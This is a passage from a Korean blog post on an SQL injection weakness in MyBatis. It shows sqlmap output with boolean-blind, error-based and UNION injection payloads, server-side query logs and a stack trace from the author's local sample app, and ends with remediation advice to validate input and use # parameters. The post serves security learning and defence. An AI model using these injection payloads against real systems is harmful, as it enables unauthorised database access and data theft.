(i\r\nf any)? [y\/N] y\r\nsqlmap identified the following injection points with a total of 35 HTTP(s) requ\r\nests:\r\n---\r\nPlace: GET\r\nParameter: keyword\r\n    Type: boolean-based blind\r\n    Title: AND boolean-based blind - WHERE or HAVING clause\r\n    Payload: keyword=1%' AND 8727=8727 AND '%'='\r\n\r\n    Type: error-based\r\n    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n    Payload: keyword=1%' AND (SELECT 2116 FROM(SELECT COUNT(*),CONCAT(0x3a687a75\r\n3a,(SELECT (CASE WHEN (2116=2116) THEN 1 ELSE 0 END)),0x3a666c6b3a,FLOOR(RAND(0)\r\n*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='\r\n\r\n    Type: UNION query\r\n    Title: MySQL UNION query (NULL) - 11 columns\r\n    Payload: keyword=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0\r\nx3a687a753a,0x42484962644d724a544f,0x3a666c6b3a),NULL,NULL,NULL,NULL#\r\n---\r\n[09:27:06] [INFO] the back-end DBMS is MySQL\r\nweb application technology: JSP\r\nback-end DBMS: MySQL 5.0\r\n[09:27:06] [INFO] fetching database names\r\navailable databases [7]:\r\n[*] information_schema\r\n[*] mybatis_sample\r\n[*] mysql\r\n[*] performance_schema\r\n[*] sakila\r\n[*] test\r\n[*] world\r\n\r\n[09:27:06] [WARNING] HTTP error codes detected during run:\r\n500 (Internal Server Error) - 11 times\r\n[09:27:06] [INFO] fetched data logged to text files under 'C:\\Python27\\apollo89_\r\nstudy\\sqlmap\\output\\localhost'\r\n\r\n[*] shutting down at 09:27:06\r\n\r\nC:\\Python27\\sqlmap><\/pre>\n
\uc704\uc758 \uacb0\uacfc\uc640 \uac19\uc774 sql injection\ub97c \ud1b5\ud574 db\uc758 \uc815\ubcf4\ub97c \uc54c\uc544\uc62c \uc218 \uc788\ub2e4.<\/p>\n
\uc774 \uacbd\uc6b0 mybatis\uc5d0\uc11c \ub3d9\uc791\ud558\ub294 \ubc29\uc2dd\uc744 \ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4..<\/p>\n
 ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%8640%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%9464%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1[')](])(\"(%' \r\n ==> Parameters: \r\n 2013. 4. 3 \uc624\ud6c4 9:22:59 org.apache.catalina.core.StandardWrapperValve invoke\r\n\uc2ec\uac01: Servlet.service() for servlet [jsp] in context with path [\/mybatis_sample] threw exception [An exception occurred processing JSP page \/index.jsp at line 17\r\n\r\n14: } else {\r\n15: \tHashMap<String,String> map = new HashMap<String,String>();\r\n16: \tmap.put(\"keyword\",keyword);\r\n17: \tlist = dao.getItems2(map); \r\n18: }\r\n19: %>\r\n20: <!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n\r\nStacktrace:] with root cause\r\ncom.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')](])(\"(%'' at line 3\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)\r\n\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)\r\n\tat java.lang.reflect.Constructor.newInstance(Unknown Source)\r\n\tat com.mysql.jdbc.Util.handleNewInstance(Util.java:411)\r\n\tat com.mysql.jdbc.Util.getInstance(Util.java:386)\r\n\tat com.mysql.jdbc.SQLError.createSQLException(SQLError.java:1054)\r\n\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:4120)\r\n\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:4052)\r\n\tat com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2503)\r\n\tat com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2664)\r\n\tat com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2815)\r\n\tat com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:2155)\r\n\tat com.mysql.jdbc.PreparedStatement.execute(PreparedStatement.java:1379)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)\r\n\tat java.lang.reflect.Method.invoke(Unknown Source)\r\n\tat org.apache.ibatis.logging.jdbc.PreparedStatementLogger.invoke(PreparedStatementLogger.java:58)\r\n\tat $Proxy5.execute(Unknown Source)\r\n\tat org.apache.ibatis.executor.statement.PreparedStatementHandler.query(PreparedStatementHandler.java:56)\r\n\tat org.apache.ibatis.executor.statement.RoutingStatementHandler.query(RoutingStatementHandler.java:70)\r\n\tat org.apache.ibatis.executor.SimpleExecutor.doQuery(SimpleExecutor.java:57)\r\n\tat org.apache.ibatis.executor.BaseExecutor.queryFromDatabase(BaseExecutor.java:267)\r\n\tat org.apache.ibatis.executor.BaseExecutor.query(BaseExecutor.java:141)\r\n\tat org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:105)\r\n\tat org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:81)\r\n\tat org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:101)\r\n\tat org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:95)\r\n\tat com.apollo89.mybatis_sample.ItemDao.getItems2(ItemDao.java:29)\r\n\tat org.apache.jsp.index_jsp._jspService(index_jsp.java:85)\r\n\tat org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:722)\r\n\tat org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:432)\r\n\tat org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:390)\r\n\tat org.apache.jasper.servlet.JspServlet.service(JspServlet.java:334)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:722)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:305)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:210)\r\n\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:225)\r\n\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:169)\r\n\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:472)\r\n\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:168)\r\n\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:98)\r\n\tat org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:927)\r\n\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118)\r\n\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:407)\r\n\tat org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:999)\r\n\tat org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:565)\r\n\tat org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:307)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.runTask(Unknown Source)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)\r\n\tat java.lang.Thread.run(Unknown Source)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1) AND 3484=8312 AND (3359=3359%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1) AND 8727=8727 AND (9350=9350%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1 AND 2863=8621%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1 AND 8727=8727%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1') AND 7322=1558 AND ('uZPV'='uZPV%' \r\n ==> Parameters: \r\n 2013. 4. 3 \uc624\ud6c4 9:23:28 org.apache.catalina.core.StandardWrapperValve invoke\r\n\uc2ec\uac01: Servlet.service() for servlet [jsp] in context with path [\/mybatis_sample] threw exception [An exception occurred processing JSP page \/index.jsp at line 17\r\n\r\n...(\uc0dd\ub7b5)...\r\n\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,0x63504b74674565576b78,0x3a666c6b3a)#%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,0x42484962644d724a544f,0x3a666c6b3a),NULL,NULL,NULL,NULL#%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,0x42484962644d724a544f,0x3a666c6b3a),NULL,NULL,NULL,NULL UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,0x417970456c47776b434e,0x3a666c6b3a),NULL,NULL,NULL,NULL#%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,0x42484962644d724a544f,0x3a666c6b3a),NULL,NULL,NULL,NULL FROM (SELECT 0 AS HIPX UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS WpyU#%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,(CASE WHEN (4527 = 4527) THEN 1 ELSE 0 END),0x3a666c6b3a),NULL,NULL,NULL,NULL#%' \r\n ==> Parameters: \r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like '%1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a687a753a,IFNULL(CAST(schema_name AS CHAR),0x20),0x3a666c6b3a),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA#%' \r\n ==> Parameters:<\/pre>\n
prepareStatement \ubc29\uc2dd\uc774 \uc544\ub2cc, \ub2e8\uc21c\ud788 $ \ud30c\ub77c\ubbf8\ud130 \uc790\ub9ac\uc5d0 String \ubcc0\uc218\uac00 replace \ub418\uace0 \uc788\ub294 \uac83\uc744 \ud655\uc778\ud560\uc218 \uc788\ub2e4. (\uc5d0\ub7ec\ub3c4 \ub9ce\uc774 \ubc1c\uc0dd\ud558\uace0 \uc788\ub2e4.)<\/p>\n
4. \ub300\uc751\ubc29\uc548<\/p>\n
– \uc785\ub825\uac12\uc744 \ubc18\ub4dc\uc2dc \uac80\uc99d\ud6c4 \uc0ac\uc6a9
\n– $ \ud30c\ub77c\ubbf8\ud130 \ub300\uc2e0 # \ud30c\ub77c\ubbf8\ud130\ub97c \uc0ac\uc6a9.<\/p>\n
\ucc38\uace0 :
\nhttps:\/\/code.google.com\/p\/mybatis\/wiki\/Welcome?tm=6
\nhttp:\/\/mybatis.github.com\/mybatis-3\/ko\/index.html
\nhttp:\/\/mybatis.github.com\/spring\/sample.html)
\nhttps:\/\/github.com\/apollo8900\/mybatis_sample\/<\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
  Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. \ucc38\uace0 :\u00a0ibatis (ibatis.apache.org) \ub294 google code \ucabd\uc73c\ub85c \uc774\uc804\ud588\uc73c\uba70, \uc774\ub984\uc744\u00a0mybatis.org\uc73c\ub85c \ubc14\uafe8\ub2e4 1. myBatis \uac1c\uc694 MyBatis … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[662,703],"tags":[1136,1138,1137,533],"class_list":["post-2175","post","type-post","status-publish","format-standard","hentry","category-java-jsp","category-securityhacking","tag-mybatis","tag-sql-injection","tag-sqlmap","tag-533"],"yoast_head":"\nmybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/apollo89.com\/wordpress\/?p=2175\" \/>\n<meta property=\"og:locale\" content=\"ko_KR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"mybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com\" \/>\n<meta property=\"og:description\" content=\"  Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. \ucc38\uace0 :\u00a0ibatis (ibatis.apache.org) \ub294 google code \ucabd\uc73c\ub85c \uc774\uc804\ud588\uc73c\uba70, \uc774\ub984\uc744\u00a0mybatis.org\uc73c\ub85c \ubc14\uafe8\ub2e4 1. myBatis \uac1c\uc694 MyBatis … Continue reading →\" \/>\n<meta property=\"og:url\" content=\"https:\/\/apollo89.com\/wordpress\/?p=2175\" \/>\n<meta property=\"og:site_name\" content=\"Apollo89.com\" \/>\n<meta property=\"article:published_time\" content=\"2013-04-03T12:50:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2013-09-12T23:32:18+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png\" \/>\n<meta name=\"author\" content=\"apollo89\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\uae00\uc4f4\uc774\" \/>\n\t<meta name=\"twitter:data1\" content=\"apollo89\" \/>\n\t<meta name=\"twitter:label2\" content=\"\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04\" \/>\n\t<meta name=\"twitter:data2\" content=\"18\ubd84\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175\"},\"author\":{\"name\":\"apollo89\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"headline\":\"mybatis sql injection \ucde8\uc57d\uc810\",\"datePublished\":\"2013-04-03T12:50:06+00:00\",\"dateModified\":\"2013-09-12T23:32:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175\"},\"wordCount\":168,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/04\\\/mybatis_flow.png\",\"keywords\":[\"mybatis\",\"sql injection\",\"sqlmap\",\"\ucde8\uc57d\uc810\"],\"articleSection\":[\"Java\\\/JSP\",\"Security\\\/Hacking\"],\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175\",\"name\":\"mybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/04\\\/mybatis_flow.png\",\"datePublished\":\"2013-04-03T12:50:06+00:00\",\"dateModified\":\"2013-09-12T23:32:18+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#breadcrumb\"},\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ko-KR\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#primaryimage\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/04\\\/mybatis_flow.png\",\"contentUrl\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/04\\\/mybatis_flow.png\",\"width\":700,\"height\":600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=2175#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\ud648\",\"item\":\"https:\\\/\\\/apollo89.com\\\/wordpress\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"mybatis sql injection \ucde8\uc57d\uc810\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/\",\"name\":\"Apollo89.com\",\"description\":\"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ko-KR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\",\"name\":\"apollo89\",\"description\":\"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"mybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/apollo89.com\/wordpress\/?p=2175","og_locale":"ko_KR","og_type":"article","og_title":"mybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com","og_description":"  Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. \ucc38\uace0 :\u00a0ibatis (ibatis.apache.org) \ub294 google code \ucabd\uc73c\ub85c \uc774\uc804\ud588\uc73c\uba70, \uc774\ub984\uc744\u00a0mybatis.org\uc73c\ub85c \ubc14\uafe8\ub2e4 1. myBatis \uac1c\uc694 MyBatis … Continue reading →","og_url":"https:\/\/apollo89.com\/wordpress\/?p=2175","og_site_name":"Apollo89.com","article_published_time":"2013-04-03T12:50:06+00:00","article_modified_time":"2013-09-12T23:32:18+00:00","og_image":[{"url":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png","type":"","width":"","height":""}],"author":"apollo89","twitter_card":"summary_large_image","twitter_misc":{"\uae00\uc4f4\uc774":"apollo89","\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04":"18\ubd84"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#article","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175"},"author":{"name":"apollo89","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"headline":"mybatis sql injection \ucde8\uc57d\uc810","datePublished":"2013-04-03T12:50:06+00:00","dateModified":"2013-09-12T23:32:18+00:00","mainEntityOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175"},"wordCount":168,"commentCount":0,"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png","keywords":["mybatis","sql injection","sqlmap","\ucde8\uc57d\uc810"],"articleSection":["Java\/JSP","Security\/Hacking"],"inLanguage":"ko-KR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/apollo89.com\/wordpress\/?p=2175#respond"]}]},{"@type":"WebPage","@id":"https:\/\/apollo89.com\/wordpress\/?p=2175","url":"https:\/\/apollo89.com\/wordpress\/?p=2175","name":"mybatis sql injection \ucde8\uc57d\uc810 - Apollo89.com","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#primaryimage"},"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png","datePublished":"2013-04-03T12:50:06+00:00","dateModified":"2013-09-12T23:32:18+00:00","author":{"@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"breadcrumb":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#breadcrumb"},"inLanguage":"ko-KR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/apollo89.com\/wordpress\/?p=2175"]}]},{"@type":"ImageObject","inLanguage":"ko-KR","@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#primaryimage","url":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png","contentUrl":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/04\/mybatis_flow.png","width":700,"height":600},{"@type":"BreadcrumbList","@id":"https:\/\/apollo89.com\/wordpress\/?p=2175#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\ud648","item":"https:\/\/apollo89.com\/wordpress"},{"@type":"ListItem","position":2,"name":"mybatis sql injection \ucde8\uc57d\uc810"}]},{"@type":"WebSite","@id":"https:\/\/apollo89.com\/wordpress\/#website","url":"https:\/\/apollo89.com\/wordpress\/","name":"Apollo89.com","description":"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/apollo89.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ko-KR"},{"@type":"Person","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82","name":"apollo89","description":"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.","url":"https:\/\/apollo89.com\/wordpress\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/2175","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2175"}],"version-history":[{"count":0,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/2175\/revisions"}],"wp:attachment":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2175"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2175"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2175"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}